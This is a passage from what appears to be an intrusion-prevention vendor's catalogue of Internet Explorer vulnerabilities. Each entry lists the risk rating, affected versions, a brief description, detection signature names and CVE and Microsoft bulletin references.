First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Internet Explorer. An exploitation could lead to the crashing of the affected IE process.
Situation: File-Text_Microsoft-Internet-Explorer-Body-Element-Use-After-Free
References:
CVE-2011-2000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2000
OSVDB-76212
http://www.osvdb.org/76212
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0;
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150
References:
CVE-2015-6150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6150
MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124
Back to top

Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0
Type: Input Validation
Description: There is a denial of service vulnerability in Internet Explorer related to the BrowseDialog ActiveX control.
Situation: File-Text_Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service
References:
CVE-2007-0371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0371
BID-22110
http://www.securityfocus.com/bid/22110
OSVDB-34647
http://www.osvdb.org/34647
Back to top

Microsoft-Internet-Explorer-Cattrarray-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an object of type CStyleAttrArray being treated as an object of type CAttrArray while being freed. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Cattrarray-Type-Confusion
References:
CVE-2015-6142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6142
MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124
Back to top

Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Cross-site Scripting
Description: There exists a flaw in Microsoft Internet Explorer's security restriction implementation. A specially crafted Channel Definition Format (CDF) file can allow remote code execution in the "Local Machine" security zone. Successful exploitation of this vulnerability can allow for code execution with the privileges of the currently logged in user.
Situation: File-TextId_Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting
References:
CVE-2005-0056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0056
BID-12437
http://www.securityfocus.com/bid/12437
MS05-014
http://technet.microsoft.com/security/bulletin/MS05-014
Back to top

Microsoft-Internet-Explorer-CElement-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: Internet Explorer 9.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to a use-after-free error while handling <object> tags in HTML files. Remote attackers can exploit this vulnerability by enticing target users to open a malicious webpage, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario where arbitrary code is injected and executed on the target machine, the behavior of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally. A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error handling HTTP 30x server redirect responses that contain the CDL protocol.
Situation: FTP_Oversized-Username
HTTP_SS-Microsoft-Internet-Explorer-CElement-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption-2
References:
CVE-2011-1256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1256
BID-48207
http://www.securityfocus.com/bid/48207
OSVDB-72948
http://www.osvdb.org/72948
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There exists a remote code execution vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing
References:
CVE-2012-1523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1523
OSVDB-82860
http://www.osvdb.org/82860
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability
References:
CVE-2012-1538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1538
BID-56420
http://www.securityfocus.com/bid/56420
MS12-071
http://technet.microsoft.com/security/bulletin/MS12-071
Back to top

Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an out-of-bounds write error in CGeneratedContent::UnWrapContent() that occurs when handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption
References:
CVE-2015-1622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1622
BID-72927
http://www.securityfocus.com/bid/72927
OSVDB-119347
http://www.osvdb.org/119347
MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018
Back to top

Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused by a use-after-free error on a CGenericElement object when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption
References:
CVE-2013-1347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347
OSVDB-92993
http://www.osvdb.org/92993
MS13-038
http://technet.microsoft.com/security/bulletin/MS13-038
Back to top

Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028
References:
CVE-2013-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0028
MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009
Back to top

Microsoft-Internet-Explorer-Clipboard-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to insufficient access restriction to the clipboard of a user who visits a website. By enticing a target user to open a crafted web page, a remote attacker can exploit this vulnerability to access the data stored on the Windows clipboard.
Situation: File-Text_Microsoft-Internet-Explorer-Clipboard-Information-Disclosure
References:
CVE-2014-6323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6323
OSVDB-114518
http://www.osvdb.org/114518
MS14-065
http://technet.microsoft.com/security/bulletin/MS14-065
Back to top

Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer 7. An attempt to access an object that has been deleted can cause memory corruption. A remote attacker can exploit this vulnerability by enticing the target user to view a malicious HTML file, potentially leading to code execution in the context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit
File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit
References:
CVE-2009-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0075
BID-33627
http://www.securityfocus.com/bid/33627
OSVDB-51839
http://www.osvdb.org/51839
MS09-002
http://technet.microsoft.com/security/bulletin/MS09-002
Back to top

Microsoft-Internet-Explorer-cloneNode-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-cloneNode-Use-After-Free
References:
CVE-2012-2557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2557
BID-55647
http://www.securityfocus.com/bid/55647
MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063
Back to top

Microsoft-Internet-Explorer-Code-Execution-SA2757760

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760
File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760-2
References:
CVE-2012-4969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969
MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063
Back to top

Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption
References:
CVE-2012-1876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876
OSVDB-82866
http://www.osvdb.org/82866
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow

About this vulnerability: A Microsoft Internet Explorer Compressed Content URL Heap Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Microsoft Internet Explorer, in the processing of compressed data used with the HTTP 1.1 protocol, which allows remote attackers to cause a denial of service condition and possibly execute arbitrary code.
Situation: HTTP_CSU-Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow
References:
CVE-2006-3873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3873
Back to top

Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There exists an information disclosure vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure
References:
CVE-2012-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0010
BID-51931
http://www.securityfocus.com/bid/51931
OSVDB-79265
http://www.osvdb.org/79265
MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010
Back to top

Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0
Type: Malfunction
Description: A code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is caused by the dereferencing of a pointer after the corresponding memory has been released. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free
References:
CVE-2013-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0027
BID-57831
http://www.securityfocus.com/bid/57831
OSVDB-90124
http://www.osvdb.org/90124
MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009
Back to top

Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
File-Text_Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
References:
CVE-2008-3472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3472
BID-31615
http://www.securityfocus.com/bid/31615
MS08-058
http://technet.microsoft.com/security/bulletin/MS08-058
Back to top

Microsoft-Internet-Explorer-Cross-Domain-Information-Disclosure-CVE-2010-3330

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-347-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330
File-Text_Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330
References:
CVE-2010-3330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3330
MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071
Back to top

Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection

About this vulnerability: A Microsoft Internet Explorer Cross-Domain JavaScript Injection vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Javascript Injection
Description: A vulnerability in Microsoft Internet Explorer, versions 9 through 11, which allows remote attackers to bypass Same Origin Policy and inject arbitrary web script or HTML, which can result in sensitive information disclosure or possible further attacks.
Situation: File-Text_Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection
References:
CVE-2015-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0072
BID-72489
http://www.securityfocus.com/bid/72489
OSVDB-117876
http://www.osvdb.org/117876
Back to top

Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Low
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 5.0; Internet Explorer 6.0
Type: Malfunction
Description: There exists a vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass
References:
CVE-2004-2383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2383
BID-9761
http://www.securityfocus.com/bid/9761
Back to top

Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243

About this vulnerability: A cross-site scripting vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: There is a cross-site scripting vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
References:
CVE-2010-3243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3243
MS10-072
http://technet.microsoft.com/security/bulletin/MS10-072
Back to top

Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324

About this vulnerability: A cross-site scripting vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: There is a cross-site scripting vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
References:
CVE-2010-3324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3324
MS10-072
http://technet.microsoft.com/security/bulletin/MS10-072
Back to top

Microsoft-Internet-Explorer-Cstr-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Internet Explorer. A remote attacker can use this to gain access to sensitive information.
Situation: File-Text_Microsoft-Internet-Explorer-Cstr-Use-After-Free
References:
CVE-2017-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0059
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 9.0
Type: Malfunction
Description: An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused by an error in CTableCell::get_cellIndex function in mshtml.dll. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would cause an information disclosure. Microsoft has not released an advisory regarding this vulnerability at this point.
Situation: File-Text_Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure
Back to top

Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an out-of-bounds memory access. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption
References:
CVE-2015-2499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2499
MS15-094
http://technet.microsoft.com/security/bulletin/MS15-094
Back to top

Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Internet Explorer. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free
References:
MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056
Back to top

Microsoft-Internet-Explorer-CTreePos-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 7; Windows Vista; Windows 2003; Windows 2008
Software: Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused by a Use-After-Free error when processing script code that accesses a CTreePos object. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free
References:
CVE-2013-3845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3845
BID-62187
http://www.securityfocus.com/bid/62187
OSVDB-97097
http://www.osvdb.org/97097
MS13-069
http://technet.microsoft.com/security/bulletin/MS13-069
Back to top

Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability
References:
CVE-2012-1539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1539
BID-56421
http://www.securityfocus.com/bid/56421
MS12-071
http://technet.microsoft.com/security/bulletin/MS12-071
Back to top

Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 11.0
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Internet Explorer. The vulnerability is due to a read out of boundary when handling CTxtPtr::InsertRange objects. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, an attacker could disclosure the memory content of the current process which can be used to facilitate further attacks.
Situation: File-Text_Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error
Back to top

Microsoft-Internet-Explorer-CVE-2010-3971

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-4
Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-3
Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-2
Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-2
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-4
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-3
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-4
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-3
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-2
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-5
File-Text_JavaScript-Cookie-Xor-Obfuscation-Method
References:
CVE-2010-3971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3971
BID-45246
http://www.securityfocus.com/bid/45246
MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003
Back to top

Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A use-after-free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to improperly freeing a child element such as CAnchorElement and trying to access the freed object later. A remote attacker could exploit these vulnerabilities by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free
References:
CVE-2013-3163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3163
OSVDB-94981
http://www.osvdb.org/94981
MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055
Back to top

Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption
References:
CVE-2013-3184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3184
OSVDB-96182
http://www.osvdb.org/96182
MS13-059
http://technet.microsoft.com/security/bulletin/MS13-059
Back to top

Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption
References:
CVE-2013-3203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3203
OSVDB-97092
http://www.osvdb.org/97092
MS13-069
http://technet.microsoft.com/security/bulletin/MS13-069
Back to top

Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption
References:
CVE-2013-3205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3205
BID-62208
http://www.securityfocus.com/bid/62208
OSVDB-97094
http://www.osvdb.org/97094
MS13-069
http://technet.microsoft.com/security/bulletin/MS13-069
Back to top

Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
